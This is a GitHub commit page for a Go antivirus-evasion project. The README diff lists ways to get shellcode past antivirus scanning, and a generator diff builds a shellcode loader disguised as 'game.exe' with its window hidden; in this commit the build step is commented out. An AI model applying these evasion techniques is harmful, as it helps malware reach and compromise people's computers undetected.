Skip to content

Commit

Permalink
update
Browse files Browse the repository at this point in the history
  • Loading branch information
@safe6Sec
safe6Sec committed Aug 24, 2021
1 parent f4c7049 commit 1ca487e
Show file tree
Hide file tree
Showing 2 changed files with 10 additions and 5 deletions.
10 changes: 8 additions & 2 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,8 @@
## 免杀思路
### 静态
静态免杀比较简单,可选加密payload或者分离payload。
核心:把特征去除即可过静态,某些杀毒软件带沙箱,还需要考虑反沙箱。
核心:
把特征去除即可过静态,某些杀毒软件带沙箱,还需要考虑反沙箱。
除此之外还可以考虑如下方式:
由于要引入net包,导致文件大小比较大。我不做测试了。
把payload分离远程服务器
Expand All @@ -28,7 +29,12 @@ golang和c++有点不一样不需要考虑处理IAT。


## 说明
test1、test2效果还可以。

2021.8.24
直接用gen里面代码进行生成,演示视频已经放公众号,目前免杀已达目的更新会放缓。
注意:建议每次使用之前手动改一下key,如果被杀改一下关键字即可。





Expand Down
5 changes: 2 additions & 3 deletions gen/main.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,6 @@ import (
"fmt"
"io/ioutil"
"os"
"os/exec"
"strings"
)

Expand Down Expand Up @@ -40,9 +39,9 @@ func main() {
code = strings.ReplaceAll(code, "${bdata}", bdata)

ioutil.WriteFile("shellcode.go", []byte(code), 0666)
cmd := exec.Command("go", "build", "shellcode.go", "-ldflags=\"-s -w -H=windowsgui\"", "-o", "game.exe", "shellcode.go")
//cmd := exec.Command("go", "build", "shellcode.go", "-ldflags=\"-s -w -H=windowsgui\"", "-o", "game.exe", "shellcode.go")
//cmd:=exec.Command("go","build shellcode.go -ldflags=\"-s -w -H=windowsgui\" -o main2.exe shellcode.go")
cmd.Run()
//cmd.Run()
//os.Remove("shellcode.go")

}

0 comments on commit 1ca487e

Please sign in to comment.